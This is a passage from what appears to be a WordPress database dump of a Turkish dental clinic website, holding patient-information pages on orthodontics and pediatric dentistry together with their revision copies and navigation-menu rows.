hastalarda yaş artık bir faktör değildir. İskeletsel bozuklukların bulunmadığı ve sadece dişlerin konumlarından kaynaklanan sorunlar, her yaşta düzeltilebilir. Bu bozukluklar dişlerin braketler aracılığı ile istenen konumlarına taşınması ile çözülür. Ortodontik bozukluklara iskeletsel sorunlar da eşlik ediyorsa ve hastanın çenelerindeki bozukluklar dışarıdan da belli oluyorsa, hastada ortognatik cerrahi uygulanabilir.\r\n\r\n<strong>Çocuk Ortodontisi</strong>\r\n\r\nOrtodontik tedavilerin büyük çoğunluğu, süt dişlerindeki çürükler sebebiyle dişlerin erken kaybı sonucu oluşur. Erken çekilen süt dişleri, daimi dişlerin yerleşmesi için gerekli olan yerin kaybedilmesine ve dolayısı ile sürmekte olan daimi dişin ağızda yer bulamamasına sebep olacaktır.\r\n\r\nBazı durumlarda, süt dişlerinde çapraşıklıklar olmasa dahi, daimi dişlenmeye geçerken kalıtımsal sebepli iskeletsel ve dişsel bozukluklar oluşabilir. İskeletsel bozuklukların oluşmasında, parmak ve emzik emme gibi kötü alışkanlıkların da etkisi vardır. Bu alışkanlıkların erken yaşta bırakılması, bu bozuklukların ilerlemesini durdurur, bazen de düzeltebilir. Burun solunumunun engellendiği bazı durumlarda da (bademcik ve geniz eti varlığı gibi durumlar) iskeletsel sorunlar oluşabilmektedir. Bu gibi sorunların erken tanısı ve tedavisi amacıyla, her çocuğun ortodontik muayeneden geçmesi gereklidir.\r\n\r\n<strong>Ebeveynlerin ortodontik takibi</strong>\r\n\r\nÇocuk 6-8 aylık olduğunda ilk süt dişleri sürmeye başlar ve 3 yaşına kadar diş sürmesi devam eder. 3-6 yaş arasında stabil kalan diş dizisi, 6-7 yaşlarında önde keser dişlerin ve en arkada 6 yaş dişleri sürmeleri ile değişmeye başlar. Genel olarak süt dişlenme safhasında sorunlar görülmezse de anne ve babalar özellikle çıkmayan veya yanlış doğrultuda süren süt dişlerine dikkat etmelidirler.\r\nDaimi dişlenmeye geçiş aşamasında ise dikkat edilmesi gereken durumlar şunlardır:\r\n<ul>\r\n 	<li>Süt dişlerinin erken kaybı,</li>\r\n 	<li>Üst keser dişlerin çok önde veya arkada sürmeleri,</li>\r\n 	<li>Yeni süren daimi dişlerde renk ve şekil bozuklukları,</li>\r\n 	<li>Süt dişlerinin zamanında düşememesi sonucu daimi diş sürmelerinin gecikmesi,</li>\r\n 	<li>6 yaşında süren birinci büyük azı dişlerindeki çürükler,</li>\r\n 	<li>Üst çenenin dar olması sonucu alt çeneyi örtmemesi,</li>\r\n 	<li>Alt ve üst ön dişlerin birbirlerini örtmemesi,</li>\r\n 	<li>Parmak veya emzik emme gibi çeşitli kötü alışkanlıkların varlığı.</li>\r\n 	<li>Alt ve üst ön dişlerin birbirlerini örtmemesi</li>\r\n</ul>\r\n<strong>Süt dişlerinin önemi</strong>\r\n\r\nSüt dişlerindeki çürüklerin dişlerinin zamanından önce çekilmesinin; ortodontik bozukluklara, daimi dişlerin çene kemiği içerisinde gömük kalmasına neden olduğu kanıtlanmış bir gerçektir.\r\n\r\nSüt dişleri, doğumdan sonraki 6. aydan itibaren belirli bir sırayla sürmeye başlarlar ve yaklaşık 2,5 yaşındaki bir çocukta tüm süt dişleri sürmüş olur. Alt ve üst çenede toplam 20 tane süt dişi, 6 yaşına kadar ağızda kalmaya devam eder. Bu dönemden 12 yaşına kadar tüm süt dişleri, sırayla yerlerini daimi dişlere bırakır. Bu değişim döneminde süt dişlerinde oluşan büyük çürükler ve erken süt dişi kayıpları, daha arkada bulunan dişlerin bu boşluklara doğru hareketi sonucu çapraşıklıklara ve daimi dişlerin süremeyerek gömük kalmalarına neden olabilir. Bu nedenle, süt dişlerinin sağlıklı bir şekilde ağızda kalmaları oldukça önemlidir.\r\n\r\nOrtodontik bozuklukların oluşumunda süt dişlenme dönemindeki durumlar, tek başına sorumlu değildir. Ortodontik sorunlar, genetik olarak da anne-baba veya daha büyük aile üyelerinden çocuklara geçebilmektedir. Bunun dışında, bebeklik döneminde anne sütüyle yetersiz beslenerek veya biberon ve yalancı emzik kullanımına yönelik yapılan yanlışlıklar; çocukluk dönemindeki parmak emme, dudak emme, dil itimi ve ağızdan solunum gibi kötü alışkanlıklar da ortodontik sorunlara yol açabilmektedir.\r\n\r\n<strong>Tedavide kullanılan aygıtlar</strong>\r\n\r\nOrtodontik tedavinin temel prensibi, önce sebebin ortadan kaldırılması, daha sonra oluşmuş bozukluğun düzeltilmesidir. Dişsel ve iskelesel bozukluklar, parmak emme veya ağız solunumu gibi nedenlerle oluşmuşsa, bu alışkanlıkların devamını engelleyecek hareketli veya sabit aygıtlar kullanılır. Bu davranışların büyüme çağında durdurulması, dişsel ve iskeletsel sorunları durdurur, hatta düzelmesini sağlar.\r\n\r\n<strong>Genel olarak iki tip aygıt vardır:</strong>\r\n\r\nHareketli aygıtlar, genelde birkaç dişi içeren basit bozuklukların düzeltilmesinde kullanılırlar. Bu aygıtların, dişleri itmeye yarayan yayları veya çeneyi genişletmeye yarayan vidaları bulunabilir. Bu aygıtlar genelde birkaç ay kullanılabilirler.\r\n\r\nSabit aygıtlar, yani braketler, dişlerin üzerine yapıştırılırlar ve genelde daha zor tedavilerde kullanılırlar. Braketler, metal renginde olabileceği gibi, erişkin hastaların kullanımına yönelik olarak diş renginde de üretilmiş olan çeşitleri vardır. Porselen braketler genellikle erişkin hastalarda kullanılırlar. Bu braketler, en küçük renklenmeyi bile belli ettikleri için, ağız bakımına çok daha fazla özen gösterilmelidir.\r\n\r\nÇocuklarda büyüme çağında, iskeletsel bozuklukların düzeltilmesinde, bazı durumlarda ağız dışındaki bölgelerden de destek almak gerekebilir. Alt çenenin önde olduğu durumlarda çenelikler, üst çenenin önde olduğu durumlarda üst çeneyi geriye çekmek amacıyla enselikler kullanılabilir. Bu aygıtlar, genellikle günde 14-16 saat arasında kullanılsa da, doktorunuz çocuğunuza özel kullanım süreleri belirleyecektir.\r\n\r\nOrtodontik tedavinin etkin ve hızlı biçimde yapılabilmesi için, hasta katılımı da çok önemlidir. Ortodonti, hasta, hekim ve anne-baba arasında oynanan bir takım oyunudur. Hastaların hareketli aygıtlarını ve ağız içi elastiklerini anlatıldığı şekilde ve istenen sürede takmaları, ağız hijyenlerini üst seviyede tutmaları çok önemlidir.\r\n\r\n<strong>Ortodontik tedavinin gündelik yaşam üzerindeki etkisi</strong>\r\n\r\nOrtodontik tedavi, çocukluk çağında yaygın biçimde uygulanan bir tedavidir. Çocuk, ortodontik tedavi sırasında küçük kısıtlamalar dışında her şeyi yapabilir. Spor faaliyetlerine katılabilir, şarkı söyleyebilir ve müzik aletleri çalabilir. Ortodontik tedavi çocuğun derslerini olumsuz yönde etkilemeyeceği gibi, kişiliğinin ve bedeninin gelişme aşamasında hem dış görünüşünü hem de ağız sağlığını geliştirecek, bedensel ve ruhsal sağlığının daha dengeli olmasını sağlayacaktır.\r\n\r\nTedavi sırasında en çok dikkat edilmesi gereken nokta, her yemekten sonra dişlerin doğru şekilde fırçalanmasıdır. Doktorunuz çocuğunuza ağız hijyenini nasıl sağlayacağı konusunda yardımcı olacaktır. Ortodontik tedavi sırasında diş fırçalama alışkanlığının yerleşmesi, ömür boyu sürecek ağız ve diş sağlığının garantisidir.\r\n\r\nSabit aygıtların zarar görmemesi, tedavinin etkinliği açısından çok önemlidir. Sert gıdaların ısırılması tellere zarar verebilir. Bunu engellemek için, çekirdekli meyveleri ve cips, kraker gibi yiyecekleri daha dikkatli yemek, braketlere yapışabilecek besinleri çok sık tüketmemek yeterli olacaktır.\r\n\r\nTedavinin başlangıç safhasında dişlerde, dişetlerinde ve yanaklarda geçici bir süre çeşitli rahatsızlıklar olabilir. Bu durum, ortodontik aygıtlara alışma sürecinin doğal bir sonucudur. 2-3 gün sürebilen bu hafif rahatsızlık, tedavinin geri kalan sürecinde görülmeyecektir.\r\n\r\n<strong>Tedavinin süresi</strong>\r\n\r\nSadece dişleri ilgilendiren basit çapraşıklıklar, 6ay-1 sene arasında değişebilen tedavi süresine ihtiyaç duyarlar. Bu süre her hastada farklı olmakla beraber, yapılacak tedavinin tipine, kullanılan aygıtların türüne ve yaş, cinsiyet gibi bireysel faktörlere bağlıdır. Diş çapraşıklıklarının düzeltilmesi amacıyla, bazı durumlarda diş çekimi yapmak gerekebilir. Bu durumda tedavi süresi genellikle 18-24 ay arasında olabilir.\r\n\r\nErken teşhis edilen ve tedavisine çocukluk çağında başlanması gereken bazı iskeletsel sorunlarda ise, tedavi daha uzun sürebilmekte, bununla birlikte yapılan tedavinin yoğunluğu azaltılmaktadır. Tedaviniz sırasında, ortalama olarak 4-6 haftada bir ortodontistinizi ziyaret etmeniz gerekecektir. Bu süre, tedavi sürecinize göre değişebilir.\r\n\r\n<strong>Erişkin ortodontisi</strong>\r\n\r\nSağlıklı, düzgün dişler ve güzel bir gülümseme, kişinin kendisini doğru ifade edebilmesi için ilk ve en önemli basamaktır. Çapraşıklar ve düzensiz görünümlü dişler, hem estetik olarak kötü bir görünüme neden olurlar, hem de ağız sağlığı ve genel sağlığın bozulmasına sebep olurlar.\r\n\r\nÇocukluk çağında, gerekli olan ortodontik tedaviler maddi sorunlar yüzünden yapılamamış olabilir. Bazen de düzgün olan dişler, çekimler ve diş eti sorunları sebebiyle sonradan bozulabilir. Kaybedilen dişler, geride kalan dişlerin diş boşluğuna doğru hareket etmesine sebep olarak, dişlerin aralanmasına veya bir tarafa doğru eğilmesine sebep olabilir. Alt ve üst dişlerin düzgün olarak kapanmaması durumunda, estetik sorunlar dışında, çene ekleminde düzensizlikler, ağrılar ve çenenin açılamamasına kadar gidebilen sorunlar başlayabilir. Dişlerdeki çapraşıklıklar diş sağlığını ve genel sağlığı olumsuz yönde etkilemekle kalmaz, aynı zamanda bireyin kendini toplumda geri planda kalmış ve mutsuz hissetmesine sebep olur.\r\n\r\nGeçmiş yıllarda, dişsel bozuklukların düzeltilmesi amacıyla, porselen kaplamalar kullanılmaktaydı. Günümüzde ise, gelişen tedavi teknikleri ve malzeme teknolojisi sayesinde, artık erişkin kişilerin de ortodontik tedaviden faydalanmaları mümkün olmuştur. Kullanılacak estetik braketler ve teller sayesinde çevredeki insanlar fark etmeden ortodontik tedavi devam edecektir.\r\n\r\nBirey, ortodontik tedavi sırasında küçük kısıtlamalar dışında her şeyi yapmakta özgürdür. İş ve sosyal hayatına devam edebilir, her türlü spor faaliyetine katılabilir. Braketler, konuşmak, şarkı söylemek ya da müzik aleti çalmak gibi aktiviteleri kısıtlamayacaktır.\r\n\r\n<strong>Tedavi sırasında dikkat edilmesi gerekenler</strong>\r\n\r\nOrtodontik tedavinizin başlarında, bazı rahatsızlıklar hissetmeniz normaldir. Dişleriniz ve ağız dokularınız braketlerinize birkaç gün içinde alışacaktır. Doktorunuz, tedavi başındaki sıkıntılarınızın azalmasına yönelik tedbirler alacaktır.\r\n\r\nTedaviniz sırasında uymanız gereken en önemli kural, diş ve dişeti sağlığınızı korumak amacıyla, ağız hijyeninizi en üst seviyede tutmaktır. Bu amaçla ortodontistiniz size uygun fırçalama tekniklerini anlatacaktır. Dişlerinizi, her yemekten sonra fırçalamanız gerekmektedir. Tedaviniz sırasında ve sonrasında, diş ipi kullanmanız ara yüz çürüklerinin engellenmesini sağlayacaktır.\r\n\r\nTellerinizin zarar görmemesi için, sert ve yapışkan gıdalardan uzak durmalısınız. Zeytin, erik gibi çekirdekli gıdalar, kuruyemişler, sert çikolatalar, dişlerinize ve tellerinize zarar verebilir.\r\n\r\n<strong>Tedavi süresi</strong>\r\n\r\nGelişen tedavi teknikleri sayesinde, erişkin yaşta da hızlı ve etkili tedaviler uygulamak mümkün olmuştur. Sadece dişleri ilgilendiren basit çapraşıklıklar, 12-24 ay arasında değişebilen tedavi süresine ihtiyaç duyarlar. Bu süre her hastada farklı olmakla beraber, yapılacak tedavinin tipine, kullanılan aygıtların türüne ve yaş, cinsiyet gibi bireysel faktörlere bağlıdır.\r\n\r\nOrtodontik tedavi süresince, randevular genelde 4-6 hafta arasında olacaktır. Bu süre, tedavi gereksinimlerinize göre değişiklikler gösterebilir. Tedavi süresince karşılaşabileceğiniz her türlü sorunda, ortodontistinize danışabilirsiniz.\r\n\r\n<strong>Lingual Ortodonti</strong>\r\n\r\nGünümüzde gelişmekte olan bir başka tedavi şekli de, braketlerin, dişlerin iç yüzeylerine yapıştırıldığı “Lingual Ortodonti” dir. Lingual ortodontide kullanılan özel braket ve teller dişlerin görünür yüzeyleri yerine iç yüzeylerine yapıştırılmakta ve bu sayede tedavi görmekte olduğunuzu sizin ve doktorunuzun dışında kimse fark etmemektedir. Lingual ortodontik tedavi tekniğinin, kendisine has bazı kısıtlamaları, avantaj ve dezavantajları bulunmaktadır. Ortodontistiniz, muayenenizden sonra sizi bu konuda bilgilendirecektir. Ortodontideki yenilikler bununla sınırlı değildir. lütfen tıklayınız…[/vc_column_text][/vc_column][/vc_row]', 'Ortodonti / Diş Teli Tedavisi', '', 'inherit', 'closed', 'closed', '', '6367-revision-v1', '', '', '2018-07-16 13:10:51', '2018-07-16 10:10:51', '', 6367, 'http://www.ze-dent.com/6367-revision-v1/', 0, 'revision', '', 0),
(6369, 1, '2018-07-16 13:12:08', '2018-07-16 10:12:08', '[vc_row][vc_column][vc_column_text]<strong>Çocuk Diş Hekimliği (Pedodonti)</strong>\r\n\r\nPedodonti (Pediatrik/Çocuk Dişhekimliği), tanım olarak bebeklerin, çocukların ve özel ilgi gerektiren bireylerin ağız ve diş sağlığı sorunları ile uğraşan bir dişhekimliği dalıdır. Pedodonti, dişhekimliğinin yaşa bağlı olan tek dalıdır.\r\n\r\nPedodonti yaş ile sınırlandırılmıştır fakat pedodontistler çocukların tedavi ihtiyacına göre periodontal tedavi, dolgu ve diş çekimi gibi tüm dişhekimliği tedavilerini yapabilmektedir. Pedodontistler çocukların ilk karşılaştıkları diş hekimleridir. Bebeklikten genç erişkinliğe kadar geçen süre içerisinde tüm ağız-diş sağlığı sorunları ve koruyucu tedavileri pedodontistler tarafından yapılmaktadır. Pedodontistler ayrıca özel ilgi gerektiren; engelliler ile kronik hastalığa sahip çocukların da ağız-diş sağlığı sorunlarını çözmeye yönelik bilgi ve tecrübeye sahiptirler.\r\n\r\nTıpkı çocuk doktorları gibi çocuk diş hekimleri (pedodontistler) de çocuklardaki ağız ve diş sağlığı sorunlarının çözümü için uğraşırlar. Pedodontistler, çocuklardaki ağız-diş sağlığı sorunlarının çözümüne ek olarak; koruyucu diş hekimliği uygulamaları, çocuklarla iletişim kurma, diş hekimi korkusunun yenilmesine yönelik pozitif davranış yönlendirmesi ve diğer teknikler üzerine diş hekimliği eğitimine ek olarak uzmanlık eğitimi almışlardır.\r\n\r\n<strong>Pedodontist ile ilk tanışma</strong>\r\n\r\nBunun için en ideal zaman bebeğin ilk dişleri çıktıktan sonraki altı aydır. Çünkü; dişlerle ilgili problemler çok erken yaşlarda başlayabilmektir. Bu dönemde bebeğin beslenmesi, diş bakımı ve emme alışkanlığı hakkında bilgi edinerek ortaya çıkacak problemleri başlamadan önlemek mümkün olacaktır.\r\n\r\nÇocuğun ilk diş hekimi ziyareti genellikle bir tanışma şeklinde olmaktadır. İlk muayenesinde herhangi bir tedavi yapılmaz, sadece ağız-diş muayenesi yapılır, ağız hijyeni ve beslenme ile ilgili bilgiler verilir. Bizce çok önemli olan ‘Pedodontist-Çocuk-Aile’den oluşan pedodontik üçgenin ilk basamağı bu seansta atılır. Daha sonra en son teknolojiler kullanılarak röntgen çekimi, çürük aktivite testleri gibi yardımcı dental tetkikler yapılarak, çocuğun diş hekimliği açısından mevcut durumu ve ihtiyaçları tespit edilir, bir sonraki seansta yapılacak işlemler konusunda aile ve çocuk bilgilendirilir.\r\n\r\nGenellikle birçok diş hekimi, hastaları diş koltuğuna oturduğunda sadece onların şikayetlerine ve dişlerine konsantre olurlar. Halbuki biz pedodontistler için en önemli kriter diş değil, çocuğun kendisidir. Çünkü biliriz ki; diş hekimi korkusu olmayan bir çocuk zaten dişlerini kolaylıkla tedavi ettirecektir. Bu sebepten dolayı çoğunlukla ilk birkaç seans çocuğun diş hekimi korkusu mevcutsa hiçbir tedavi yapılmadan sadece çocuğun bu korkusunu yenmeye yönelik konuşmalar ve alıştırmalar yaparız. Genellikle yaşları çok küçük çocuklar haricinde, ailelerin tedavi odasına çocukları ile birlikte girmelerini tercih etmiyoruz. Çünkü çoğu zaman aileler kendi korku ve endişelerini çocuklarına yansıtmakta ve çocuğun tedavi odasındaki pozitif davranışlarını olumsuz etkilemektedirler. Tecrübelerimiz ve daha önce yapılmış çalışmalar çocukların tedavi odasında yalnız kaldığı durumlarda diş hekimi ile olan kooperasyonunu olumlu yönde etkilediğini göstermektedir. Unutmayın ki; pedodontist-çocuk ilişkisi ne kadar iyi olursa yapılacak tedaviler de o kadar başarılı olacaktır.\r\n\r\nPedodontistler çocukların diş tedavisi öncesi ve tedavi esnasında nasıl sakinleştirileceği ve rahatlatılacağı konusunda özel eğitim almışlardır. Ayrıca pedodontistlerin mevcut klinik ortamları, tarzları ve yardımcı personeli de tamamen çocukların ihtiyaçlarına göre düzenlenmiştir. Dolayısıyla çocuklar pedodontistlerin kliniklerinde kendilerini çok daha rahat ve güvende hissederler. Dental işlemler öncesinde pedodontist çocuğa ‘Anlat-Göster-Uygula’ tekniği ile yapılacak işlemleri teker teker anlatır, aletleri tanıtırken başka nesnelerle özdeşleştirerek çocuğun onlardan korkmamasını sağlarlar. Tedavi sırasında çocukla pedodontist arasında sürekli iletişim devam eder, çocuğun olumlu davranışları pedodontist tarafından derhal olumlu cümleler kullanılarak ödüllendirilir, bu da çocuğun motivasyonunu pozitif yönde artırır. Eğer çocuk tedavi esnasında uyum sorunu gösterirse, ses kontrolü, desensitizasyon gibi diğer kooperasyon yöntemleri kullanılarak tedaviye devam edilmeye çalışılır. Eğer hiçbir yöntem işe yaramıyor ise o zaman sedasyon veya genel anestezi düşünülebilir.\r\n\r\n<strong>Çocuklarda diş çürükleri/yaşam kalitesi</strong>\r\n\r\nAğız-diş sağlığı sorunları hem gelişmiş ülkelerde hem de gelişmemiş ülkelerde çocuklarda sıklıkla görülen bir sağlık sorunudur. Çocuklarda, beslenme veya diş fırçalama alışkanlıklarına bağlı olarak görülen kötü ağız hijyeni; büyüme ve gelişmenin yavaşlamasına sebep olabilir. Son yapılan araştırmalarda erken çocukluk döneminde ağızlarında diş çürükleri bulunan çocukların, ilerideki dönemlerde de diş çürüklerine yatkın bir bünyeye sahip olabileceklerini göstermektedir. Erken teşhis ve koruyucu tedavi yöntemleri; çocukların sağlıklı büyümeleri için en etkili çözüm olarak gözükmektedir. Ayrıca, yapılan çalışmalar erken çocukluk döneminde ağzında çürük bulunan çocuklarda dikkat bozukluğu, derslerde başarısızlık, düzensiz uyku, iştahsızlık/yemek yeme zorluğu ve çevresi ile iletişim kurmada güçlük gibi çok önemli psikolojik ve fizyolojik sorunlara da yol açabileceği belirtilmektedir.\r\n\r\nDiş çürüklerine bağlı olarak ağrı çeken çocuklar; soğuk/sıcak veya sert gıdaları çiğneyemez veya yutamazlar. Bu yetersiz beslenmeye bağlı olarak çocuklarda kilo kaybı ile diş çürüklerinin ilerlemesine bağlı olarak baş/boyun ve çene bölgesinde ciddi enfeksiyonlar görülebilmektedir. Büyüme gelişmesi devam eden çocuklarda görülebilecek bu tarz enfeksiyonlar fokal enfeksiyon odağı olarak çocukların diğer hayati organlarını da (örn. kalp, böbrek, karaciğer vs.) tehdit etmektedir.\r\n\r\nSabahları ağzındaki diş çürüğüne bağlı olarak kahvaltısını yetersiz yapan bir çocuğun okulda derslerine yeterince konsantre olması veya gece diş ağrısına bağlı olarak yeterince uykusunu alamamış bir çocuğun derslerini anlamasını beklemek pek mümkün değildir. Bütün bu olumsuzluklar çocuğun öğrenme isteğini kaybetmesine veya çevresi ile iletişim kurmasına engel olabilir.\r\n\r\nGenellikle ülkemizde ailelerin yaklaşımı özellikle okul çağındaki çocukların ağızlarında hem süt hem de daimi dişler bulunduğu için; nasıl olsa süt dişi düşecek tarzında olmaktadır. Halbuki süt azı dişleri genellikle 11-12 yaşına kadar ağızda kalmakta ve beslenmede çok önemli rol oynamaktadır. Çocukların dişlerinin sağlıklı olması onların başarılı ve sağlıklı bir birey olmalarında önemli rol oynamaktadır.\r\n\r\nTüm bu olumsuzlukların yaşanmaması için düzenli diş hekimi / pedodontist (çocuk diş hekimi) kontrolü, diş çürüklerinin önlenmesinde veya erken teşhisinde ilk ve en önemli basamaktır. Ayrıca dengeli beslenme ve düzenli diş fırçalama alışkanlığı sayesinde çocuklarda bir ömür boyu çürüksüz dişlere sahip olmak artık çok kolaydır.[/vc_column_text][/vc_column][/vc_row]', 'Çocuk Diş Hekimliği (Pedodonti)', '', 'publish', 'closed', 'closed', '', 'cocuk-dis-hekimligi-pedodonti', '', '', '2018-07-16 13:12:08', '2018-07-16 10:12:08', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6369', 0, 'us_portfolio', '', 0),
(6370, 1, '2018-07-16 13:12:08', '2018-07-16 10:12:08', '[vc_row][vc_column][vc_column_text]<strong>Çocuk Diş Hekimliği (Pedodonti)</strong>\r\n\r\nPedodonti (Pediatrik/Çocuk Dişhekimliği), tanım olarak bebeklerin, çocukların ve özel ilgi gerektiren bireylerin ağız ve diş sağlığı sorunları ile uğraşan bir dişhekimliği dalıdır. Pedodonti, dişhekimliğinin yaşa bağlı olan tek dalıdır.\r\n\r\nPedodonti yaş ile sınırlandırılmıştır fakat pedodontistler çocukların tedavi ihtiyacına göre periodontal tedavi, dolgu ve diş çekimi gibi tüm dişhekimliği tedavilerini yapabilmektedir. Pedodontistler çocukların ilk karşılaştıkları diş hekimleridir. Bebeklikten genç erişkinliğe kadar geçen süre içerisinde tüm ağız-diş sağlığı sorunları ve koruyucu tedavileri pedodontistler tarafından yapılmaktadır. Pedodontistler ayrıca özel ilgi gerektiren; engelliler ile kronik hastalığa sahip çocukların da ağız-diş sağlığı sorunlarını çözmeye yönelik bilgi ve tecrübeye sahiptirler.\r\n\r\nTıpkı çocuk doktorları gibi çocuk diş hekimleri (pedodontistler) de çocuklardaki ağız ve diş sağlığı sorunlarının çözümü için uğraşırlar. Pedodontistler, çocuklardaki ağız-diş sağlığı sorunlarının çözümüne ek olarak; koruyucu diş hekimliği uygulamaları, çocuklarla iletişim kurma, diş hekimi korkusunun yenilmesine yönelik pozitif davranış yönlendirmesi ve diğer teknikler üzerine diş hekimliği eğitimine ek olarak uzmanlık eğitimi almışlardır.\r\n\r\n<strong>Pedodontist ile ilk tanışma</strong>\r\n\r\nBunun için en ideal zaman bebeğin ilk dişleri çıktıktan sonraki altı aydır. Çünkü; dişlerle ilgili problemler çok erken yaşlarda başlayabilmektir. Bu dönemde bebeğin beslenmesi, diş bakımı ve emme alışkanlığı hakkında bilgi edinerek ortaya çıkacak problemleri başlamadan önlemek mümkün olacaktır.\r\n\r\nÇocuğun ilk diş hekimi ziyareti genellikle bir tanışma şeklinde olmaktadır. İlk muayenesinde herhangi bir tedavi yapılmaz, sadece ağız-diş muayenesi yapılır, ağız hijyeni ve beslenme ile ilgili bilgiler verilir. Bizce çok önemli olan ‘Pedodontist-Çocuk-Aile’den oluşan pedodontik üçgenin ilk basamağı bu seansta atılır. Daha sonra en son teknolojiler kullanılarak röntgen çekimi, çürük aktivite testleri gibi yardımcı dental tetkikler yapılarak, çocuğun diş hekimliği açısından mevcut durumu ve ihtiyaçları tespit edilir, bir sonraki seansta yapılacak işlemler konusunda aile ve çocuk bilgilendirilir.\r\n\r\nGenellikle birçok diş hekimi, hastaları diş koltuğuna oturduğunda sadece onların şikayetlerine ve dişlerine konsantre olurlar. Halbuki biz pedodontistler için en önemli kriter diş değil, çocuğun kendisidir. Çünkü biliriz ki; diş hekimi korkusu olmayan bir çocuk zaten dişlerini kolaylıkla tedavi ettirecektir. Bu sebepten dolayı çoğunlukla ilk birkaç seans çocuğun diş hekimi korkusu mevcutsa hiçbir tedavi yapılmadan sadece çocuğun bu korkusunu yenmeye yönelik konuşmalar ve alıştırmalar yaparız. Genellikle yaşları çok küçük çocuklar haricinde, ailelerin tedavi odasına çocukları ile birlikte girmelerini tercih etmiyoruz. Çünkü çoğu zaman aileler kendi korku ve endişelerini çocuklarına yansıtmakta ve çocuğun tedavi odasındaki pozitif davranışlarını olumsuz etkilemektedirler. Tecrübelerimiz ve daha önce yapılmış çalışmalar çocukların tedavi odasında yalnız kaldığı durumlarda diş hekimi ile olan kooperasyonunu olumlu yönde etkilediğini göstermektedir. Unutmayın ki; pedodontist-çocuk ilişkisi ne kadar iyi olursa yapılacak tedaviler de o kadar başarılı olacaktır.\r\n\r\nPedodontistler çocukların diş tedavisi öncesi ve tedavi esnasında nasıl sakinleştirileceği ve rahatlatılacağı konusunda özel eğitim almışlardır. Ayrıca pedodontistlerin mevcut klinik ortamları, tarzları ve yardımcı personeli de tamamen çocukların ihtiyaçlarına göre düzenlenmiştir. Dolayısıyla çocuklar pedodontistlerin kliniklerinde kendilerini çok daha rahat ve güvende hissederler. Dental işlemler öncesinde pedodontist çocuğa ‘Anlat-Göster-Uygula’ tekniği ile yapılacak işlemleri teker teker anlatır, aletleri tanıtırken başka nesnelerle özdeşleştirerek çocuğun onlardan korkmamasını sağlarlar. Tedavi sırasında çocukla pedodontist arasında sürekli iletişim devam eder, çocuğun olumlu davranışları pedodontist tarafından derhal olumlu cümleler kullanılarak ödüllendirilir, bu da çocuğun motivasyonunu pozitif yönde artırır. Eğer çocuk tedavi esnasında uyum sorunu gösterirse, ses kontrolü, desensitizasyon gibi diğer kooperasyon yöntemleri kullanılarak tedaviye devam edilmeye çalışılır. Eğer hiçbir yöntem işe yaramıyor ise o zaman sedasyon veya genel anestezi düşünülebilir.\r\n\r\n<strong>Çocuklarda diş çürükleri/yaşam kalitesi</strong>\r\n\r\nAğız-diş sağlığı sorunları hem gelişmiş ülkelerde hem de gelişmemiş ülkelerde çocuklarda sıklıkla görülen bir sağlık sorunudur. Çocuklarda, beslenme veya diş fırçalama alışkanlıklarına bağlı olarak görülen kötü ağız hijyeni; büyüme ve gelişmenin yavaşlamasına sebep olabilir. Son yapılan araştırmalarda erken çocukluk döneminde ağızlarında diş çürükleri bulunan çocukların, ilerideki dönemlerde de diş çürüklerine yatkın bir bünyeye sahip olabileceklerini göstermektedir. Erken teşhis ve koruyucu tedavi yöntemleri; çocukların sağlıklı büyümeleri için en etkili çözüm olarak gözükmektedir. Ayrıca, yapılan çalışmalar erken çocukluk döneminde ağzında çürük bulunan çocuklarda dikkat bozukluğu, derslerde başarısızlık, düzensiz uyku, iştahsızlık/yemek yeme zorluğu ve çevresi ile iletişim kurmada güçlük gibi çok önemli psikolojik ve fizyolojik sorunlara da yol açabileceği belirtilmektedir.\r\n\r\nDiş çürüklerine bağlı olarak ağrı çeken çocuklar; soğuk/sıcak veya sert gıdaları çiğneyemez veya yutamazlar. Bu yetersiz beslenmeye bağlı olarak çocuklarda kilo kaybı ile diş çürüklerinin ilerlemesine bağlı olarak baş/boyun ve çene bölgesinde ciddi enfeksiyonlar görülebilmektedir. Büyüme gelişmesi devam eden çocuklarda görülebilecek bu tarz enfeksiyonlar fokal enfeksiyon odağı olarak çocukların diğer hayati organlarını da (örn. kalp, böbrek, karaciğer vs.) tehdit etmektedir.\r\n\r\nSabahları ağzındaki diş çürüğüne bağlı olarak kahvaltısını yetersiz yapan bir çocuğun okulda derslerine yeterince konsantre olması veya gece diş ağrısına bağlı olarak yeterince uykusunu alamamış bir çocuğun derslerini anlamasını beklemek pek mümkün değildir. Bütün bu olumsuzluklar çocuğun öğrenme isteğini kaybetmesine veya çevresi ile iletişim kurmasına engel olabilir.\r\n\r\nGenellikle ülkemizde ailelerin yaklaşımı özellikle okul çağındaki çocukların ağızlarında hem süt hem de daimi dişler bulunduğu için; nasıl olsa süt dişi düşecek tarzında olmaktadır. Halbuki süt azı dişleri genellikle 11-12 yaşına kadar ağızda kalmakta ve beslenmede çok önemli rol oynamaktadır. Çocukların dişlerinin sağlıklı olması onların başarılı ve sağlıklı bir birey olmalarında önemli rol oynamaktadır.\r\n\r\nTüm bu olumsuzlukların yaşanmaması için düzenli diş hekimi / pedodontist (çocuk diş hekimi) kontrolü, diş çürüklerinin önlenmesinde veya erken teşhisinde ilk ve en önemli basamaktır. Ayrıca dengeli beslenme ve düzenli diş fırçalama alışkanlığı sayesinde çocuklarda bir ömür boyu çürüksüz dişlere sahip olmak artık çok kolaydır.[/vc_column_text][/vc_column][/vc_row]', 'Çocuk Diş Hekimliği (Pedodonti)', '', 'inherit', 'closed', 'closed', '', '6369-revision-v1', '', '', '2018-07-16 13:12:08', '2018-07-16 10:12:08', '', 6369, 'http://www.ze-dent.com/6369-revision-v1/', 0, 'revision', '', 0),
(6371, 1, '2018-07-16 13:13:27', '2018-07-16 10:13:27', ' ', '', '', 'publish', 'closed', 'closed', '', '6371', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6371', 17, 'nav_menu_item', '', 0),
(6372, 1, '2018-07-16 13:13:27', '2018-07-16 10:13:27', ' ', '', '', 'publish', 'closed', 'closed', '', '6372', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6372', 18, 'nav_menu_item', '', 0),
